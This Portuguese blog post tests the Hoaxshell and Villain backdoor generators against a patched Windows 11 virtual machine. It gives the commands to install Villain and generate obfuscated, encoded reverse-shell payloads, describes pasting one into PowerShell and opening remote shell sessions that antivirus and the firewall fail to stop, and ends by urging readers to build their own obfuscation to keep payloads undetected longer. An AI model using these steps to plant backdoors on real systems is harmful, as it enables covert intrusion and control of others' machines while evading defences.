Posts Villain o Hoaxshell que funciona!
Post
Cancel

Villain o Hoaxshell que funciona!

No artigo anterior escrevi sobre um gerador de payload ofuscado para Windows chamado Hoaxshell, mas com as atualizações constantes do Windows as ferramentas maliciosas começam a ser bloqueadas. Neste artigo voltei a testar o Hoaxshell na versão atualizada do Windows 11, testei também o Villain e vou apresentar o resultado dos testes.

Baixando Windows atualizado Assim como no artigo anterior, foi utilizada a versão de developer disponibilizada pela Microsoft no site: Maquinas virtuais Windows

site oficial para download de imagens do S.O

Utilizamos a OVA para Virtualbox, no site a Microsoft disponibiliza o Hash de cada arquivo zip para conferencia posterior.

hash arquuivo zip virtualbox

Para verificar o hash do arquivo baixado pelo powershell, use o comando get-filehash obtendo o hash do arquivo zip

Iniciando o Windows 11 Enterprise, Build 22000.co_release.210604-1628

Windows 11, Build 22000.co_release.210604-1628

Procurei utilizar a versão mais atualizada do sistema operacional, antes de iniciar os testes verificamos se existia alguma atualização pendente e deixamos o S.O com os últimos patches liberados.

configurações do S.O

Testando a comunicação da máquina Windows para máquina com Kali Linux temos comunicação normal como podemos ver no resultado do ipconfig.

ip local e teste de comunicação com host kali linux

Mas devido ao firewall do Windows 11 estar ativado não conseguimos comunicação da máquina Kali Linux com a máquina Windows 11.

firewall ativado no windows 11

teste de Ping do host Kali para Windows

1° Teste

No primeiro teste testamos uma carga de um payload gerado com Hoaxshell com firewall ativado.

payload gerado pelo HoaxShell

Podemos ver que nessa versão do Windows 11 o código foi bloqueado pelo antivírus

payload bloqueado pelo antivirus

2° Teste

Desativamos o firewall do Windows 11 e geramos novo payload no Linux.

sistema de firewall desativado

Novamente o antivírus bloqueou a comunicação.

payload bloqueado pelo antivirus

3° Teste

Para o terceiro teste usaremos o Villain, conforme descrito pelo altor o Villian é:

“O Villain é um gerador de backdoor para Windows e Linux e um manipulador de várias sessões que permite aos usuários se conectarem a servidores irmãos (outras máquinas executando o Villain) e compartilharem suas sessões de backdoor, úteis para trabalhar em equipe. A ideia principal por trás das cargas geradas por essa ferramenta é herdada do HoaxShell . Pode-se dizer que o vilão é uma versão evoluída induzida por esteróides dele”.

Para instalar o villain basta seguir as orientações do repositório:

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

resultado do comando pip3 install -r requirements.txt

Gerando o Payload:

Para gerar o payload recomendo que leia o guia disponível em:

Guia de uso Villain

Alguns exemplos:

Para Windows:

Villain > generate os=windows lhost=eth0 obfuscate

Villain > generate os=windows lhost=192.168.12.36 exec_outfile=”C:\Users\$env:USERNAME.local\hack.ps1” encode

Para Linux:

Villain > generate os=linux lhost=192.168.12.62

gerando payload com os dados da interface eth0

Colando o payload no powershell podemos verificar que a comunicação foi realizada com sucesso.

executando o payload no powershell

Para visualizar status da sessão digitamos sessions

visualizando as conexões com comando sessions

Para abrir a sessão é necessário digitar o comando:

Shell (id da sessão)

shell e213e0da-601ea9d1-2d187bc1

resultado do comando systeminfo

Repetimos o mesmo processo com o firewall ativado.

firewall ativado

Novamente tivemos sucesso na conexão utilizando o payload gerado com o villian.

nova sessão criada

Conclusão:

Ferramentas como Hoaxshell e Villain usam técnicas de econdamento para ofuscar suas cargas, confundindo as proteções do sistema operacional, mas com a divulgação destas ferramentas a Microsoft e outros fornecedores geram atualizações buscando mitigar as vulnerabilidades. É importante entender como essas ferramentas funcionam para que você possa desenvolver suas próprias ferramentas de ofuscação fazendo assim que suas soluções fiquem funcionais por muito mais tempo.